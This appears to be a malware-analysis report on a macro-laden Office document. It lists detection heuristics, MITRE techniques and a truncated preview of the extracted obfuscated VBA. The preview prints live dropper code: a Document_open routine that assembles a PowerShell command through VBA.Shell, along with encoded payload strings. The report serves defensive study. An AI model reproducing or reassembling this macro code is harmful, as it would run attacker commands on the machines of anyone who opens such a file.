MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' and the 'Document_Open' macro firing indicate that the macros are designed to execute arbitrary commands. The VBA script attempts to construct and execute a command using the Shell() function, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6769654-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6769654-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13585 bytes |
SHA-256: f0cf9f003d2e95b94cb4c09863733bf0b75d5733c74070fb975567db175ab08d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CiHHNPiVWVp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZfpOouF()
On Error Resume Next
mKMRs = Tan(64876)
MVCkun = ZSQqOt
BhPmm = NXzsk
fAAZG = CDbl(uKDYm * CDbl(VABAG + Int(Kjpos * Rnd(78264)) * kNVWaJ * Log(91798 * zzRGSI - RYzdvF + Fix(51))))
GsPmM = Tan(67616)
QqHLz = CDbl(oYncO)
uljfIA = Tan(32032)
cUblpc = CBnKW
wjHJu = mvtlU
Etuja = CDbl(dvHiz * CDbl(tSbBMN + Int(UwcQlv * Rnd(51503)) * RKdYfV * Log(99351 * cZslrf - GNkHQ + Fix(51))))
UbLKI = Tan(31948)
dIozTL = CDbl(dJUdtd)
zcfas = Tan(76434)
qAXMt = bzzPL
zQEmY = lcEQd
wwIPE = CDbl(LnFaH * CDbl(owoKj + Int(zIKRw * Rnd(22053)) * pMVru * Log(96422 * KoYbQf - zJvGZJ + Fix(51))))
ZutWV = Tan(67325)
VLjzz = CDbl(OKpwLc)
YtEPU = Tan(35922)
vfobu = zwUHiq
KSocr = TjapTw
wmNzES = CDbl(pMVWwV * CDbl(vnWZz + Int(KSEBXj * Rnd(66678)) * XAHfQ * Log(32841 * PwufYi - zwSjW + Fix(51))))
CMskq = Tan(31698)
iiMZYj = CDbl(RLNqf)
ZfpOouF = ZAQhfKrzhu + VBA.Shell(jjZowsEEF + Chr(PROUXnw + vbKeyP + rpUbJUzbK) + "owers" + PQqVK + NDkWZJHwSw + UwjLz + okEzTabHzBL + cRZqYWA + ojhPBidkRv, 55450 - 55450)
VIVMwU = Tan(90141)
zMzzOE = IqvUs
hwhlUH = bulicB
KsEdV = CDbl(VkKaij * CDbl(GGmQV + Int(jWwzDG * Rnd(73731)) * VEiZGp * Log(86097 * IaSWQ - zoHHlu + Fix(51))))
cBivr = Tan(20860)
vBXjH = CDbl(jbBXuU)
FijwRV = Tan(35135)
sVjbq = VulaTJ
ENZvmI = QMGjrZ
XvYNhQ = CDbl(FEFCr * CDbl(wkPoN + Int(XkjnC * Rnd(24720)) * bIwkL * Log(55304 * LcAnw - EczJTs + Fix(51))))
AwMMK = Tan(39537)
IoIWA = CDbl(pMIUtZ)
End Function
Private Sub Document_open()
On Error Resume Next
OaWjh = Tan(75872)
wXpnDE = JwBzHH
RDorR = BOQqoa
XNIwU = CDbl(kwHWOp * CDbl(jasjI + Int(DPGoh * Rnd(84886)) * rjGdv * Log(71648 * ptnoff - FNJhaC + Fix(51))))
AwczS = Tan(80840)
DRYaE = CDbl(jAqda)
QCMQw = Tan(88015)
diCUq = BLiBF
mcONb = IEWfG
FjYmSc = CDbl(dYCTR * CDbl(OEGrG + Int(MfblNY * Rnd(80722)) * JBuiRB * Log(20469 * ZEWQUK - wjIzu + Fix(51))))
GdJjzO = Tan(95775)
dvLNc = CDbl(uciXCQ)
ZfpOouF
NUEWY = Tan(43154)
CtfIT = tcPQV
tGisJ = UQrRMF
lilAsa = CDbl(rGztFm * CDbl(jBizIj + Int(PWAJL * Rnd(3880)) * lTMozu * Log(18103 * HwoofP - HknXGl + Fix(51))))
vQswhO = Tan(35763)
krhYv = CDbl(mmEGr)
ovXUb = Tan(21605)
jkPRkH = UQdrJ
mUWGH = kIAVf
fiiVhL = CDbl(RitzUV * CDbl(cpljtU + Int(VlhXYB * Rnd(5598)) * lctko * Log(15874 * XAYhz - rtXBl + Fix(51))))
vGVGsk = Tan(57001)
KzBwI = CDbl(hwtQD)
End Sub
Attribute VB_Name = "nmOYNISZkz"
Function PQqVK()
On Error Resume Next
cjZfGV = Tan(13487)
lQdOtE = SLKibL
qhvuiQ = TMstIf
TFOfc = CDbl(kIjbGQ * CDbl(HnnNm + Int(YtMDPc * Rnd(30357)) * HilSo * Log(34134 * qKZTin - hBUnR + Fix(51))))
pKPnzK = Tan(29205)
GCwDM = CDbl(cdvIR)
MEKqiiMizpF = "HeLL -jOin" + "('41L70h94R" + "122S111M79M8" + "8S4" + "5@48Z45R99" + "K1" + "04@" + "122h32h98K" + "111Z103Z10" + "4L110S12"
jbfQPX = Tan(57320)
ddWmA = jshkG
bjHaP = kdEGL
SHLDK = CDbl(BVowwT * CDbl(spEBY + Int(wwoKjV * Rnd(77076)) * iPpHEW * Log(11290 * PlYuTK - WdnnDX + Fix(51))))
zbFFM = Tan(37668)
fhWHSG = CDbl(qrzRza)
XQXUV = "1@" + "45M127" + "~1" + "08L99M1" + "05h98M96K54~41M" + "78@93Z1"
UlXsBD = Tan(74204)
BVpKM = hHtzS
RGqYL = rWmwqm
FNzCu = CDbl(XLQnAl * CDbl(QXlPD + Int(ikIMnE * Rnd(20184)) * Ivuwqw * Log(68226 * VPZtdL - BTqmK + Fix(51))))
iNbnH = Tan(66198)
BKzkiO = CDbl(WrJnR)
UaYUrDAwwU = "23M90S1" + "00h1" + "22M45M48" + ">45>9" + "9K104M122K32h98"
jioMG = Tan(46759)
FMLRT = dJUYRc
zUFbJu = micjwt
SPhhp = CDbl(FpHNfk * CDbl(aGAnU + Int(UThQOB * Rnd(33076)) * ucRQTG * Log(20727 * uoVAO - JMswZi + Fix(51))))
TnJWDp = Tan(89756)
lzTjXE = CDbl(NqwLd)
ntwKOKFqEol = "K111S103" + "R104" + ">110Z1" + "21L45~94>" + "116S126R12" + "1M104~96~3" + "5M67Z10"
hHCmBq = Tan(88003)
ClJiM = tCzWq
juVpc = jwWvk
ZPTTXt = CDbl(vfQbBE * CDbl(zwPOsw + Int(jVSqbq * Rnd(39764)) * MwchjM * Log(80644 * iEKlnp - STlrK + Fix(51)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.